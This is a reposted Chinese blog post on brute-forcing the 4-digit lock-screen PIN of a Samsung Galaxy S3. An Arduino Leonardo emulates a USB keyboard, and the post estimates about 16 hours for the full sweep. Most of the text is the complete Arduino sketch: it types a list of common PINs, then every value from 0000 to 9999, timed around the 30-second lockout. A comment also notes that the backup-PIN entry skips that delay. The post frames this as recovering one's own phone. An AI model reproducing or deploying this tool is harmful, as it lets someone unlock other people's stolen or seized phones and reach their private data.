转载自:http://www.alsrobot.cn/article-572.html 、 https://www.zybuluo.com/plantpark/note/26852

使用过安卓手机的小伙伴们肯定会有些惨痛经历,经常会忘记手机解锁图形和PIN码,但如果通过Root等方式破解手机恐怕再也无法得到官方保修,这里就介绍一种方法安全的破解它!

三星Galaxy S3手机在输错5次PIN码后,会要求等待30s然后重新输入。幸运的是,每次输错后的等待时间固定为30s,不会随失败次数增加,这就给了hack的机会。
因为Arduino Leonardo可以作为HID设备模拟键盘通过USB OTG连接到手机,在这里我就选用了Leonardo,文章末尾有详细的代码。为了减少破解时间,可以把自己常用的密码或者数字组合优先测试。

当然,三星Galaxy S3手机的PIN码只有四位,如果从0000一直尝试到9999大概只需要16个小时(共10000个组合,每输错5次等待30s,约2000轮×30s≈16.7小时)。PIN码每多一位,需要尝试的组合就多十倍,这种穷举很快就不再可行;如果你的手机碰巧是小米手机,PIN码又碰巧设了17位,那你就果断Root吧~~

代码如下:

/* 
Brute forcing Android 4-digit PINs 
To run the whole range it will take upwards of 16 hours because of 
the 30 second delay after 5 bad inputs 
Interestingly, if the target phone has the pattern enabled 
and the backup PIN set, the backup PIN entry system doesn't force the 30 second delay after 
invalid attempts 
http://blog.infosecsee.com */ 
 
// Global state shared between setup() and loop().
const int buttonPin = 2; // digital input pin the start pushbutton is read from 
int previousButtonState = HIGH; // button reading from the previous loop() pass, used to detect a change 
int counter = 0; // numeric value currently being typed by loop(); the outer while runs while it is below 10000 
// 0 until the hard-coded list in loop() has been typed once; incremented to 1 afterwards
int check = 0; 
 
// One-time initialisation: configures the button pin as an input and starts
// the USB keyboard emulation that loop() types through.
void setup() { 
 
 // The start button is read with digitalRead(buttonPin) in loop().
 pinMode(buttonPin, INPUT); 
 
// From here on the board can send keystrokes to the USB host.
Keyboard.begin(); 
} 
 
// Main loop: waits for the pushbutton reading to change to HIGH, then types
// PIN candidates over the emulated USB keyboard in groups of five, pausing
// 30 seconds after each group. The whole run happens inside one call: the
// button is not read again until the outer while loop has finished.
//
// The timing mirrors the header comment (a 30 second delay after 5 bad
// inputs): the approach depends on that delay staying constant and on the
// locked device accepting input from a USB keyboard.
void loop() { 
 
int buttonState = digitalRead(buttonPin); 
// Act only on a change of the reading that ends in HIGH.
if ((buttonState != previousButtonState) && (buttonState == HIGH)) { 
// NOTE(review): pointer nudge, presumably to wake the screen or keep it
// active before typing — confirm on the device.
Mouse.move(25, 50, 0); 
// Zero-padding prefixes prepended to counter in the branches below.
String three = "000"; 
String two = "00"; 
String one = "0"; 
 
// Outer run: continues until counter reaches 10000.
while(counter < 10000){ 
 delay(1000); 
// Runs exactly once (check goes 0 -> 1): types a hard-coded list of 20
// values in four groups of five before the numeric sweep starts.
while (check < 1){ 
Keyboard.println("1234"); 
 delay(500); 
Keyboard.println("1111"); 
 delay(500); 
Keyboard.println("0000"); 
 delay(500); 
Keyboard.println("1212"); 
 delay(500); 
Keyboard.println("7777"); 
// Two empty lines (Enter only), then the 30 s wait.
// NOTE(review): presumably the Enter presses dismiss the lockout dialog — confirm.
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
// Second group of five.
Keyboard.println("1004"); 
 delay(500); 
Keyboard.println("2000"); 
 delay(500); 
Keyboard.println("4444"); 
 delay(500); 
Keyboard.println("2222"); 
 delay(500); 
Keyboard.println("6969"); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
// The pointer is moved twice here, unlike after the other groups.
Mouse.move(25, 50, 0); 
Mouse.move(25, 50, 0); 
// Third group of five.
Keyboard.println("9999"); 
 delay(500); 
Keyboard.println("3333"); 
 delay(500); 
Keyboard.println("5555"); 
 delay(500); 
Keyboard.println("6666"); 
 delay(500); 
Keyboard.println("1122"); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
// Fourth group of five; this one has an extra 500 ms delay after its last entry.
Keyboard.println("1313"); 
 delay(500); 
Keyboard.println("8888"); 
 delay(500); 
Keyboard.println("4321"); 
 delay(500); 
Keyboard.println("2001"); 
 delay(500); 
Keyboard.println("1010"); 
 delay(500); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
 check++;} 
// Numeric sweep. Each branch types five values built from counter with a
// 500 ms gap between them, advances counter between the sends, then sends
// two empty lines, waits 30 s and moves the pointer.
// Branch taken when counter is below 10: prefix "000".
if (counter < 10 && check == 1) { 
 
Keyboard.println(three + counter); 
 delay(500); 
 counter++; 
Keyboard.println(three + counter); 
 delay(500); 
 counter++; 
Keyboard.println(three + counter); 
 delay(500); 
 counter++; 
Keyboard.println(three + counter); 
 delay(500); 
 counter++; 
Keyboard.println(three + counter); 
 delay(500); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
} 
// Branch taken when counter is below 100: prefix "00".
else if (counter < 100){ 
Keyboard.println(two + counter); 
 delay(500); 
 counter++; 
Keyboard.println(two + counter); 
 delay(500); 
 counter++; 
Keyboard.println(two + counter); 
 delay(500); 
 counter++; 
Keyboard.println(two + counter); 
 delay(500); 
 counter++; 
Keyboard.println(two + counter); 
 delay(500); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
} 
// Branch taken when counter is below 1000: prefix "0".
else if (counter < 1000){ 
Keyboard.println(one + counter); 
 delay(500); 
 counter++; 
Keyboard.println(one + counter); 
 delay(500); 
 counter++; 
Keyboard.println(one + counter); 
 delay(500); 
 counter++; 
Keyboard.println(one + counter); 
 delay(500); 
 counter++; 
Keyboard.println(one + counter); 
 delay(500); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
} 
// Remaining values: counter is printed directly, without a prefix.
else { 
Keyboard.println(counter); 
 delay(500); 
 counter++; 
Keyboard.println(counter); 
 delay(500); 
 counter++; 
Keyboard.println(counter); 
 delay(500); 
 counter++; 
Keyboard.println(counter); 
 delay(500); 
 counter++; 
Keyboard.println(counter); 
 delay(500); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
}  
// End of the outer while (counter < 10000).
}  
// End of the button-change handler.
} 
 // Remember this reading so the next pass can detect a change.
 previousButtonState = buttonState; 
} 

 
